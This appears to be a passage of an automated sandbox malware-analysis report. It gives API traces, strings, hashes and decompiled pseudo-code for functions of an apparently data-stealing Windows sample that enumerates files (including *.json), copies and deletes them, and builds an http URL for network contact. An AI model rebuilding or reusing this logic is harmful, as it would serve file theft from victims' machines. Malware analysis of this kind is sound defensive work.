Part of subcall function 0040D114: lstrcat.KERNEL32(?,0043F570), ref: 0040D409

Part of subcall function 0040D114: lstrcat.KERNEL32(?,0043D134), ref: 0040D417
Part of subcall function 0040D114: lstrcat.KERNEL32(?,?), ref: 0040D431
Part of subcall function 0040D114: lstrcat.KERNEL32(?,0043D134), ref: 0040D43F
Part of subcall function 0040D114: lstrcat.KERNEL32(00000000,00000000), ref: 0040D46B

Part of subcall function 0040D624: _memset.LIBCMT ref: 0040D66B
Part of subcall function 0040D624: lstrcat.KERNEL32(?,00000000), ref: 0040D683
Part of subcall function 0040D624: wsprintfA.USER32 ref: 0040D6A3
Part of subcall function 0040D624: FindFirstFileA.KERNEL32(?,?), ref: 0040D6D4
Part of subcall function 0040D624: StrCmpCA.SHLWAPI(?,0043F354), ref: 0040D6FF
Part of subcall function 0040D624: StrCmpCA.SHLWAPI(?,0043F358), ref: 0040D719
Part of subcall function 0040D624: wsprintfA.USER32 ref: 0040D753
Part of subcall function 0040D624: GetFileAttributesA.KERNEL32(?), ref: 0040D788
Part of subcall function 0040D624: _memset.LIBCMT ref: 0040D7A9
Part of subcall function 0040D624: lstrcat.KERNEL32(?,0043D134), ref: 0040D7B9
Part of subcall function 0040D624: lstrcat.KERNEL32(?,0043F55C), ref: 0040D7CB

Part of subcall function 0040D624: wsprintfA.USER32 ref: 0040D6BD
Part of subcall function 0040D624: wsprintfA.USER32 ref: 0040D778
Part of subcall function 0040D624: lstrcat.KERNEL32(?,0043F560), ref: 0040D7DD
Part of subcall function 0040D624: lstrcat.KERNEL32(?,0043F564), ref: 0040D7EB
Part of subcall function 0040D624: lstrcat.KERNEL32(?,0043F564), ref: 0040D7F9
Part of subcall function 0040D624: lstrcat.KERNEL32(?,0043F568), ref: 0040D80B
Part of subcall function 0040D624: lstrcat.KERNEL32(?,0043F56C), ref: 0040D81D
Part of subcall function 0040D624: lstrcat.KERNEL32(?,0043F570), ref: 0040D82F
Part of subcall function 0040D624: lstrcat.KERNEL32(?,0043D134), ref: 0040D83D
Part of subcall function 0040D624: lstrcat.KERNEL32(?,?), ref: 0040D850
Part of subcall function 0040D624: lstrcat.KERNEL32(?,0043D134), ref: 0040D85E
Part of subcall function 0040D624: lstrcat.KERNEL32(?,?), ref: 0040D872
Part of subcall function 0040D624: lstrcat.KERNEL32(?,0043D134), ref: 0040D886
Part of subcall function 0040D624: lstrcat.KERNEL32(?,?), ref: 0040D899
Part of subcall function 0040D624: FindNextFileA.KERNEL32(?,?), ref: 0040D8CB
Part of subcall function 0040D624: FindClose.KERNEL32(?), ref: 0040D8DF

_memset.LIBCMT ref: 0040E213
_memset.LIBCMT ref: 0040E224
_memset.LIBCMT ref: 0040E235
_memset.LIBCMT ref: 0040E246
_memset.LIBCMT ref: 0040E257
lstrcat.KERNEL32(?,0043D134), ref: 0040E26C
lstrcat.KERNEL32(?), ref: 0040E27F
lstrcat.KERNEL32(?,0043D134), ref: 0040E28D
lstrcat.KERNEL32(?), ref: 0040E2A0
lstrcat.KERNEL32(?,0043D134), ref: 0040E2AE
lstrcat.KERNEL32(?), ref: 0040E2C1
lstrcat.KERNEL32(?,0043D134), ref: 0040E2CF
lstrcat.KERNEL32(?), ref: 0040E2E2
lstrcat.KERNEL32(?,0043D134), ref: 0040E2F0
lstrcat.KERNEL32(?,?), ref: 0040E304
lstrcat.KERNEL32(?,0043D134), ref: 0040E312
lstrcat.KERNEL32(?), ref: 0040E325
lstrcat.KERNEL32(?,0043D134), ref: 0040E333
lstrcat.KERNEL32(?), ref: 0040E346
lstrcat.KERNEL32(?,0043D134), ref: 0040E354
lstrcat.KERNEL32(?,?), ref: 0040E368
lstrcat.KERNEL32(?,0043D134), ref: 0040E376

Strings

*.*, xrefs: 0040D971, 0040D9C7, 0040DCD5, 0040E0EA, 0040E380
*.json, xrefs: 0040E141
1, xrefs: 0040E16B

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$_memset$Filewsprintf$Find$AttributesH_prolog3__strlen$CloseFirstNext
String ID: *.*$*.json$1
API String ID: 3736499273-3142089486
Opcode ID: 2924dbda3d39ce80583c71147235c87683fa92c26122064760260b4b6c2dd643
Instruction ID: 23c97e8aa5740de7598cc0b8ce161d2030b6af2237d59ab2190cd54292d4d503
Opcode Fuzzy Hash: 2924dbda3d39ce80583c71147235c87683fa92c26122064760260b4b6c2dd643
Instruction Fuzzy Hash: 06527FF5D10248ABCB11BF79DD0669E7F76EB86308F0001BEE104672A6DB350B549F9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040FBAD Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 170stringfileCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0040FBB7
_memset.LIBCMT ref: 0040FBE7
lstrcat.KERNEL32(?,?), ref: 0040FBFC

Part of subcall function 00417BB8: _malloc.LIBCMT ref: 00417BBE
Part of subcall function 00417BB8: GetTickCount.KERNEL32 ref: 00417BC9
Part of subcall function 00417BB8: _rand.LIBCMT ref: 00417BDE
Part of subcall function 00417BB8: wsprintfA.USER32 ref: 00417BF1

lstrcat.KERNEL32(?,00000000), ref: 0040FC12
CopyFileA.KERNEL32(?,?,00000001), ref: 0040FC22
DeleteFileA.KERNEL32(?,00000001), ref: 0040FE3B

Part of subcall function 0040FA8C: __EH_prolog3_GS.LIBCMT ref: 0040FA93
Part of subcall function 0040FA8C: _memcmp.LIBCMT ref: 0040FABC
Part of subcall function 0040FA8C: _memset.LIBCMT ref: 0040FAE5
Part of subcall function 0040FA8C: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,000000FF,00000000,-0000000C,?,?,00000000), ref: 0040FB20

StrCmpCA.SHLWAPI(?,0043D12C), ref: 0040FD11
StrCmpCA.SHLWAPI(?,0043D12C), ref: 0040FD26
lstrcat.KERNEL32(?,0043D130), ref: 0040FD36
lstrcat.KERNEL32(?), ref: 0040FD43
lstrcat.KERNEL32(?,?), ref: 0040FD50
lstrcat.KERNEL32(?,0043F4DC), ref: 0040FD5C
lstrcat.KERNEL32(?,?), ref: 0040FD69
lstrcat.KERNEL32(?,0043F4E0), ref: 0040FD71
lstrcat.KERNEL32(?), ref: 0040FD7E
lstrcat.KERNEL32(?,?), ref: 0040FD8B
lstrcat.KERNEL32(?,0043D130), ref: 0040FD93
lstrcat.KERNEL32(?), ref: 0040FDA0
lstrcat.KERNEL32(?,?), ref: 0040FDAD
lstrcat.KERNEL32(?,0043D130), ref: 0040FDB5
lstrcat.KERNEL32(?), ref: 0040FDC2
lstrcat.KERNEL32(?,?), ref: 0040FDDF
lstrcat.KERNEL32(?,0043F4D8), ref: 0040FDEB

Strings

ZHaZea, xrefs: 0040FC74, 0040FE0A

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileH_prolog3__memset$AllocCopyCountDeleteLocalTick_malloc_memcmp_randwsprintf
String ID: ZHaZea
API String ID: 1790762014-655617003
Opcode ID: b19e30618afe9c1fd513a1df006ebc1469f7edaf147b0ea037113c2087d79725
Instruction ID: 7484746e27ed96cd8cd6d048991bfcb1f8412ab40d73f199dfc5ab48fe426800
Opcode Fuzzy Hash: b19e30618afe9c1fd513a1df006ebc1469f7edaf147b0ea037113c2087d79725
Instruction Fuzzy Hash: 07613A36904128ABDB219F60ED09BEE7B79FF0A315F1004B6F609A11B0DB755B86CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004282BB Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E004282BB(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t14;
				void* _t15;
				void* _t16;
				void* _t18;
				intOrPtr* _t20;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t35;
				intOrPtr* _t36;
				void* _t39;
				intOrPtr* _t41;
				void* _t42;

				_t30 = __ebx;
				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t35 != 0) {
					 *0x446678 = GetProcAddress(_t35, "FlsAlloc");
					 *0x44667c = GetProcAddress(_t35, "FlsGetValue");
					 *0x446680 = GetProcAddress(_t35, "FlsSetValue");
					_t7 = GetProcAddress(_t35, "FlsFree");
					__eflags =  *0x446678;
					_t39 = TlsSetValue;
					 *0x446684 = _t7;
					if( *0x446678 == 0) {
						L6:
						 *0x44667c = TlsGetValue;
						 *0x446678 = E00427FCB;
						 *0x446680 = _t39;
						 *0x446684 = TlsFree;
					} else {
						__eflags =  *0x44667c;
						if( *0x44667c == 0) {
							goto L6;
						} else {
							__eflags =  *0x446680;
							if( *0x446680 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					 *0x444df0 = _t10;
					__eflags = _t10 - 0xffffffff;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x44667c);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E004260E5();
							_t41 = __imp__EncodePointer;
							_t14 =  *_t41( *0x446678);
							 *0x446678 = _t14;
							_t15 =  *_t41( *0x44667c);
							 *0x44667c = _t15;
							_t16 =  *_t41( *0x446680);
							 *0x446680 = _t16;
							 *0x446684 =  *_t41( *0x446684);
							_t18 = E00428DF6();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E00428008();
								goto L15;
							} else {
								_t36 = __imp__DecodePointer;
								_t20 =  *_t36( *0x446678, E0042818C); // executed
								_t21 =  *_t20(); // executed
								 *0x444dec = _t21;
								__eflags = _t21 - 0xffffffff;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E00424E54(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										__eflags =  *((intOrPtr*)( *_t36()))( *0x446680,  *0x444dec, _t42);
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E00428045(_t30, _t36, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E00428008();
					return 0;
				}
			}

0x004282bb
0x004282c9
0x004282cd
0x004282ed
0x004282fa
0x00428307
0x0042830c
0x0042830e
0x00428315
0x0042831b
0x00428320
0x00428338
0x0042833d
0x00428347
0x00428351
0x00428357
0x00428322
0x00428322
0x00428329
0x00000000
0x0042832b
0x0042832b
0x00428332
0x00000000
0x00428334
0x00428334
0x00428336
0x00000000
0x00000000
0x00428336
0x00428332
0x00428329
0x0042835c
0x00428362
0x00428367
0x0042836a
0x00428431
0x00428431
0x00428431
0x00428370
0x00428377
0x00428379
0x0042837b
0x00000000
0x00428381
0x00428381
0x0042838c
0x00428392
0x0042839a
0x0042839f
0x004283a7
0x004283ac
0x004283b4
0x004283bb
0x004283c0
0x004283c5
0x004283c7
0x0042842c
0x0042842c
0x00000000
0x004283c9
0x004283c9
0x004283da
0x004283dc
0x004283de
0x004283e3
0x004283e6
0x00000000
0x004283e8
0x004283f4
0x004283f8
0x004283fa
0x00000000
0x004283fc
0x0042840d
0x0042840f
0x00000000
0x00428411
0x00428411
0x00428413
0x00428414
0x0042841b
0x00428421
0x00428425
0x00428429
0x00428429
0x0042840f
0x004283fa
0x004283e6
0x004283c7
0x0042837b
0x00428435
0x004282cf
0x004282cf
0x004282d7
0x004282d7

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004230C9), ref: 004282C3
__mtterm.LIBCMT ref: 004282CF

Part of subcall function 00428008: DecodePointer.KERNEL32(00000001,00428431,?,004230C9), ref: 00428019
Part of subcall function 00428008: TlsFree.KERNEL32(00000001,00428431,?,004230C9), ref: 00428033
Part of subcall function 00428008: DeleteCriticalSection.KERNEL32(00000000,00000000,77D2F3A0,?,00428431,?,004230C9), ref: 00428E5D
Part of subcall function 00428008: _free.LIBCMT ref: 00428E60
Part of subcall function 00428008: DeleteCriticalSection.KERNEL32(00000001,77D2F3A0,?,00428431,?,004230C9), ref: 00428E87

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004282E5
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004282F2
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004282FF
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0042830C
TlsAlloc.KERNEL32(?,004230C9), ref: 0042835C
TlsSetValue.KERNEL32(00000000,?,004230C9), ref: 00428377
__init_pointers.LIBCMT ref: 00428381
EncodePointer.KERNEL32(?,004230C9), ref: 00428392
EncodePointer.KERNEL32(?,004230C9), ref: 0042839F
EncodePointer.KERNEL32(?,004230C9), ref: 004283AC
EncodePointer.KERNEL32(?,004230C9), ref: 004283B9
DecodePointer.KERNEL32(0042818C,?,004230C9), ref: 004283DA
FlsAlloc.KERNEL32(?,004230C9), ref: 004283DC
__calloc_crt.LIBCMT ref: 004283EF
DecodePointer.KERNEL32(00000000,?,004230C9), ref: 00428409
GetCurrentThreadId.KERNEL32 ref: 0042841B

Strings

KERNEL32.DLL, xrefs: 004282BE
FlsSetValue, xrefs: 004282F4
FlsAlloc, xrefs: 004282DF
FlsFree, xrefs: 00428301
FlsGetValue, xrefs: 004282E7

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: Pointer$AddressEncodeProc$Decode$AllocCriticalDeleteSection$CurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 2049299755-3819984048
Opcode ID: 4f3e2b2414f0c6270f53e82f431f69e0b6bcab069f919f25de06ecbfb4420391
Instruction ID: cf5a609ef865761a0593d6d6c1e1ddc602e0053accccd71ceca142cf51100e4e
Opcode Fuzzy Hash: 4f3e2b2414f0c6270f53e82f431f69e0b6bcab069f919f25de06ecbfb4420391
Instruction Fuzzy Hash: A3315F78A027219BD710AF75BC0860A7EB4AB4B761B63453FE418D32A0EB398401DF9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040B89F Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 227
stringnetworkCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E0040B89F(void* __edx, void* __eflags, intOrPtr* _a4) {
				long _v8;
				char _v16;
				signed int _v24;
				char _v1024;
				char _v2024;
				char _v3024;
				char _v8024;
				char _v8052;
				char _v8080;
				char _v8108;
				intOrPtr* _v8112;
				intOrPtr _v8116;
				intOrPtr _v8120;
				signed short _v8156;
				signed int _v8160;
				intOrPtr _v8164;
				signed int _v8172;
				intOrPtr _v8176;
				void* _v8180;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t64;
				signed int _t65;
				intOrPtr* _t67;
				char* _t81;
				intOrPtr* _t92;
				intOrPtr* _t96;
				void* _t100;
				int _t115;
				int _t117;
				void* _t127;
				char* _t129;
				intOrPtr* _t130;
				void* _t133;
				intOrPtr* _t139;
				void* _t150;
				void* _t153;
				void* _t156;
				signed int _t157;
				void* _t158;
				void* _t163;
				void* _t168;
				void* _t171;

				_t171 = __eflags;
				_t150 = __edx;
				_push(0xffffffff);
				_push(E00433763);
				_push( *[fs:0x0]);
				E0042E350(0x1fe8);
				_t64 =  *0x444664; // 0xfa3a0753
				_t65 = _t64 ^ _t157;
				_v24 = _t65;
				_push(_t65);
				 *[fs:0x0] =  &_v16;
				_t67 = _a4;
				_t127 = 0x3c;
				_v8116 =  *((intOrPtr*)(_t67 + 4));
				_v8120 =  *_t67;
				E0041F6B0( &_v8180, 0, _t127);
				E0041F6B0( &_v8024, 0, 0x1388);
				E0041F6B0( &_v2024, 0, 0x3e8);
				E0041F6B0( &_v3024, 0, 0x3e8);
				E0041F6B0( &_v1024, 0, 0x3e8);
				_v8172 = _v8172 | 0xffffffff;
				_v8160 = _v8160 | 0xffffffff;
				_v8180 = _t127;
				_t163 = _t158 + 0x3c;
				_v8164 = E0041EC5E(0x400, _t150, 0, 0x3e8, _t171, 0x400);
				_v8176 = E0041EC5E(0x400, _t150, 0, 0x3e8, _t171, 0x400);
				_t81 =  *0x4452cc; // 0x5b1588
				_t129 = 0x4452cc;
				if( *0x4452e0 < 0x10) {
					_t81 = 0x4452cc;
				}
				if(InternetCrackUrlA(_t81,  *0x4452dc, 0,  &_v8180) != 0) {
					wsprintfA( &_v2024, "%d", _v8156 & 0x0000ffff);
					_t163 = _t163 + 0xc;
					 *0x4474e0( &_v3024, _v8164);
					 *0x4474e0( &_v1024, _v8176);
					_push("://");
				} else {
					 *0x4474e0( &_v2024, "80");
					_t174 =  *0x4452e0 - 0x10;
					if( *0x4452e0 >= 0x10) {
						_t129 =  *0x4452cc; // 0x5b1588
					}
					 *0x4474e0( &_v3024, _t129);
					_push("http://");
				}
				 *0x4474e0( &_v1024);
				_t92 = E00416A49(_t129,  &_v8052, 0, 0x3e8, _t174); // executed
				_t130 = _t92;
				_v8 = 0;
				_v8112 = E00408B0B( &_v8052,  &_v8108);
				_v8 = 1;
				_t96 = E00408A63( &_v8052,  &_v8080);
				_v8 = 2;
				if( *((intOrPtr*)(_t130 + 0x14)) >= 0x10) {
					_t130 =  *_t130;
				}
				_t139 = _v8112;
				if( *((intOrPtr*)(_t139 + 0x14)) >= 0x10) {
					_t139 =  *_t139;
				}
				if( *((intOrPtr*)(_t96 + 0x14)) >= 0x10) {
					_t96 =  *_t96;
				}
				_t100 = E0040E905( &_v1024, _t150,  &_v3024, E00421EE3(),  &_v2024, _v8120, _v8116, _t96, _t139); // executed
				 *0x4474e0( &_v8024, _t100, _t130);
				E00404A66( &_v8080, 1, 0);
				E00404A66( &_v8108, 1, 0);
				_v8 = _v8 | 0xffffffff;
				E00404A66( &_v8052, 1, 0);
				E0041F6B0( &_v8180, 0, 0x3c);
				E0041F6B0( &_v2024, 0, 0x3e8);
				E0041F6B0( &_v3024, 0, 0x3e8);
				E0041F6B0( &_v1024, 0, 0x3e8);
				_t168 = _t163 + 0x4c;
				_t115 = lstrlenA( &_v8024);
				_t178 = _t115 - 4;
				if(_t115 <= 4) {
					_t117 = lstrlenA( &_v8024);
					 *0x4476ac = 1;
					__eflags = _t117 - 2;
					if(_t117 != 2) {
						 *0x4476ac = 0;
					}
				} else {
					_v8112 = _t168 - 0x1c;
					E004049CF(_t168 - 0x1c,  &_v8024);
					E00408B27(1, _t150, 0, 0x3e8, _t178);
					 *0x4476ac = 1;
				}
				 *[fs:0x0] = _v16;
				_pop(_t153);
				_pop(_t156);
				_pop(_t133);
				return E0041F69E(0, _t133, _v24 ^ _t157, _t150, _t153, _t156);
			}

0x0040b89f
0x0040b89f
0x0040b8a2
0x0040b8a4
0x0040b8af
0x0040b8b5
0x0040b8ba
0x0040b8bf
0x0040b8c1
0x0040b8c7
0x0040b8cb
0x0040b8d1
0x0040b8db
0x0040b8dd
0x0040b8ed
0x0040b8f3
0x0040b908
0x0040b91e
0x0040b92f
0x0040b940
0x0040b945
0x0040b94c
0x0040b953
0x0040b959
0x0040b967
0x0040b979
0x0040b97f
0x0040b985
0x0040b98a
0x0040b98c
0x0040b98c
0x0040b9a5
0x0040b9f1
0x0040b9f7
0x0040ba07
0x0040ba1a
0x0040ba20
0x0040b9a7
0x0040b9b3
0x0040b9b9
0x0040b9c0
0x0040b9c2
0x0040b9c2
0x0040b9d0
0x0040b9d6
0x0040b9d6
0x0040ba2c
0x0040ba38
0x0040ba3d
0x0040ba46
0x0040ba4e
0x0040ba5b
0x0040ba5f
0x0040ba64
0x0040ba6c
0x0040ba6e
0x0040ba6e
0x0040ba70
0x0040ba7a
0x0040ba7c
0x0040ba7c
0x0040ba82
0x0040ba84
0x0040ba84
0x0040bab0
0x0040bac0
0x0040bad1
0x0040bade
0x0040bae3
0x0040baef
0x0040bafe
0x0040bb0f
0x0040bb20
0x0040bb31
0x0040bb36
0x0040bb40
0x0040bb46
0x0040bb4f
0x0040bb73
0x0040bb79
0x0040bb7f
0x0040bb82
0x0040bb84
0x0040bb84
0x0040bb51
0x0040bb56
0x0040bb5d
0x0040bb62
0x0040bb6a
0x0040bb6a
0x0040bb8f
0x0040bb97
0x0040bb98
0x0040bb99
0x0040bba5

APIs

_memset.LIBCMT ref: 0040B8F3
_memset.LIBCMT ref: 0040B908
_memset.LIBCMT ref: 0040B91E
_memset.LIBCMT ref: 0040B92F
_memset.LIBCMT ref: 0040B940
InternetCrackUrlA.WININET(005B1588,00000000,?,?), ref: 0040B99D
lstrcat.KERNEL32(?,0043F4C8), ref: 0040B9B3
lstrcat.KERNEL32(?,004452CC), ref: 0040B9D0
wsprintfA.USER32 ref: 0040B9F1
lstrcat.KERNEL32(?,?), ref: 0040BA07
lstrcat.KERNEL32(?,?), ref: 0040BA1A
lstrcat.KERNEL32(?,://), ref: 0040BA2C
lstrcat.KERNEL32(?,00000000), ref: 0040BAC0
_memset.LIBCMT ref: 0040BAFE
_memset.LIBCMT ref: 0040BB0F
_memset.LIBCMT ref: 0040BB20
_memset.LIBCMT ref: 0040BB31
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000000), ref: 0040BB40
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000000), ref: 0040BB73

Part of subcall function 004049CF: _strlen.LIBCMT ref: 004049E6

Part of subcall function 00408B27: __EH_prolog3_GS.LIBCMT ref: 00408B31
Part of subcall function 00408B27: _memset.LIBCMT ref: 00408B53
Part of subcall function 00408B27: _strtok_s.LIBCMT ref: 00408B80

Strings

http://, xrefs: 0040B9D6
://, xrefs: 0040BA20

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: _memset$lstrcat$lstrlen$CrackH_prolog3_Internet_strlen_strtok_swsprintf
String ID: ://$http://
API String ID: 1590511364-3772126531
Opcode ID: 18ff1577eab677027f659aff0d5cf38ab5ffe7698dad6da897bb5276f1e1e42b
Instruction ID: bf886332ac20669fcc195d49cfa20001a494f1a04d7df45d2e49d6f9d757c6bc
Opcode Fuzzy Hash: 18ff1577eab677027f659aff0d5cf38ab5ffe7698dad6da897bb5276f1e1e42b
Instruction Fuzzy Hash: 8D8170B6D00219ABDB20DFA5DD45DEA7B7CEB45304F0005BAF509A2192E7385B45CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00411AD2 Relevance: 36.4, APIs: 24, Instructions: 431
stringCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00411AD2(void* __ebx, void* __edi, intOrPtr __esi, void* __eflags) {
				void* _t155;
				signed char _t161;
				intOrPtr _t166;
				intOrPtr* _t174;
				intOrPtr _t188;
				void* _t189;
				intOrPtr _t192;
				void* _t193;
				intOrPtr _t196;
				void* _t197;
				intOrPtr _t200;
				void* _t201;
				intOrPtr _t203;
				intOrPtr* _t212;
				void* _t220;
				void* _t224;
				intOrPtr* _t225;
				intOrPtr _t231;
				intOrPtr _t235;
				void* _t244;
				char _t283;
				void* _t289;
				intOrPtr _t324;
				intOrPtr _t325;
				intOrPtr _t327;
				intOrPtr _t328;
				intOrPtr _t331;
				intOrPtr _t332;
				intOrPtr _t335;
				intOrPtr _t336;
				void* _t338;
				void* _t339;
				void* _t340;
				void* _t341;
				intOrPtr _t343;
				char* _t349;
				void* _t352;
				void* _t353;
				void* _t355;
				void* _t356;
				void* _t357;
				intOrPtr _t358;
				intOrPtr _t386;

				_t350 = __esi;
				_t342 = __edi;
				E00423679(E00433B4D, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t355 - 0x4e4)) =  *((intOrPtr*)(_t355 + 8));
				_t283 = 0;
				E0041F6B0(_t355 - 0x3fc, 0, 0x3e8);
				_t357 = _t356 + 0xc;
				_t155 = E004181BE(0, __edi, __esi, 0x28);
				_t289 = 0x5a0;
				 *0x4474e0(_t355 - 0x3fc, _t155);
				 *0x4474e0(_t355 - 0x3fc,  *0x446b8c);
				_t161 = GetFileAttributesA(_t355 - 0x3fc); // executed
				if(_t161 == 0xffffffff) {
					L42:
					return E004236C3(_t283, _t342, _t350);
				}
				_t361 = _t161 & 0x00000010;
				if((_t161 & 0x00000010) != 0) {
					goto L42;
				}
				_push(_t355 - 0x3fc);
				_push(_t355 - 0x5ac);
				E004157AF(0, __edi, __esi, _t361);
				 *(_t355 - 4) = 0;
				_t166 = 0xf;
				 *((intOrPtr*)(_t355 - 0x404)) = _t166;
				 *((intOrPtr*)(_t355 - 0x408)) = 0;
				 *((char*)(_t355 - 0x418)) = 0;
				_t343 = 0;
				 *((intOrPtr*)(_t355 - 0x474)) = _t166;
				 *((intOrPtr*)(_t355 - 0x478)) = 0;
				 *((char*)(_t355 - 0x488)) = 0;
				 *((intOrPtr*)(_t355 - 0x458)) = _t166;
				 *((intOrPtr*)(_t355 - 0x45c)) = 0;
				 *((char*)(_t355 - 0x46c)) = 0;
				 *((intOrPtr*)(_t355 - 0x43c)) = _t166;
				 *((intOrPtr*)(_t355 - 0x440)) = 0;
				 *((char*)(_t355 - 0x450)) = 0;
				 *((intOrPtr*)(_t355 - 0x420)) = _t166;
				 *((intOrPtr*)(_t355 - 0x424)) = 0;
				 *((char*)(_t355 - 0x434)) = 0;
				 *(_t355 - 4) = 5;
				_push(0xa);
				_push(_t355 +  *((intOrPtr*)( *((intOrPtr*)(_t355 - 0x5ac)) + 4)) - 0x5ac);
				_push(E00416460(0, _t289, 0, __esi, _t361) & 0x000000ff);
				_push(_t355 - 0x418);
				_push(_t355 - 0x5ac);
				_t174 = E0041686A(0, _t289, 0, __esi, _t361);
				_t358 = _t357 + 0xc;
				asm("sbb eax, eax");
				if(( *((intOrPtr*)( *_t174 + 4)) + _t174 &  !( ~( *( *((intOrPtr*)( *_t174 + 4)) + _t174 + 0xc) & 0x00000006))) == 0) {
					L41:
					_t342 = 1;
					E00404A66(_t355 - 0x434, 1, _t283);
					E00404A66(_t355 - 0x450, 1, _t283);
					E00404A66(_t355 - 0x46c, 1, _t283);
					E00404A66(_t355 - 0x488, 1, _t283);
					E00404A66(_t355 - 0x418, 1, _t283);
					 *(_t355 - 4) =  *(_t355 - 4) | 0xffffffff;
					E00415862(_t355 - 0x544, _t350,  *(_t355 - 4));
					 *((intOrPtr*)(_t355 - 0x544)) = 0x43fd48;
					E0041EDCC(_t355 - 0x544);
					goto L42;
				} else {
					L5:
					_t188 =  *0x446ae0; // 0x6e97f0
					_t189 = E004201E0(_t188);
					_t40 = _t343 + 1; // 0x1
					_t352 = E0040CD72(_t40, _t355 - 0x418, _t188, _t189);
					if(_t352 != 0xffffffff) {
						E00404C57(_t355 - 0x418, _t283, 9);
						_t335 =  *((intOrPtr*)(_t355 - 0x418));
						if( *((intOrPtr*)(_t355 - 0x404)) < 0x10) {
							_t335 = _t355 - 0x418;
						}
						_t275 =  *((intOrPtr*)(_t355 - 0x408));
						_t338 = _t335 +  *((intOrPtr*)(_t355 - 0x408));
						_t336 =  *((intOrPtr*)(_t355 - 0x418));
						if( *((intOrPtr*)(_t355 - 0x404)) < 0x10) {
							_t336 = _t355 - 0x418;
						}
						E004153D4(_t355 - 0x418, _t355 - 0x4f4, _t275 + _t336 + 0xfffffff9, _t338);
						E00404B1F(_t355 - 0x488, _t355 - 0x418, 0, 0xffffffff);
						_t283 = 0;
					}
					_t192 =  *0x446dc4; // 0x6e9800
					_t193 = E004201E0(_t192);
					_t55 = _t352 + 1; // 0x1
					_t353 = E0040CD72(_t55, _t355 - 0x418, _t192, _t193);
					if(_t353 != 0xffffffff) {
						E00404C57(_t355 - 0x418, _t283, 9);
						_t331 =  *((intOrPtr*)(_t355 - 0x418));
						if( *((intOrPtr*)(_t355 - 0x404)) < 0x10) {
							_t331 = _t355 - 0x418;
						}
						_t267 =  *((intOrPtr*)(_t355 - 0x408));
						_t339 = _t331 +  *((intOrPtr*)(_t355 - 0x408));
						_t332 =  *((intOrPtr*)(_t355 - 0x418));
						if( *((intOrPtr*)(_t355 - 0x404)) < 0x10) {
							_t332 = _t355 - 0x418;
						}
						E004153D4(_t355 - 0x418, _t355 - 0x4f0, _t267 + _t332 + 0xfffffff9, _t339);
						E00404B1F(_t355 - 0x46c, _t355 - 0x418, 0, 0xffffffff);
						_t283 = 0;
					}
					_t196 =  *0x446f58; // 0x6e9810
					_t197 = E004201E0(_t196);
					_t70 = _t353 + 1; // 0x1
					_t350 = E0040CD72(_t70, _t355 - 0x418, _t196, _t197);
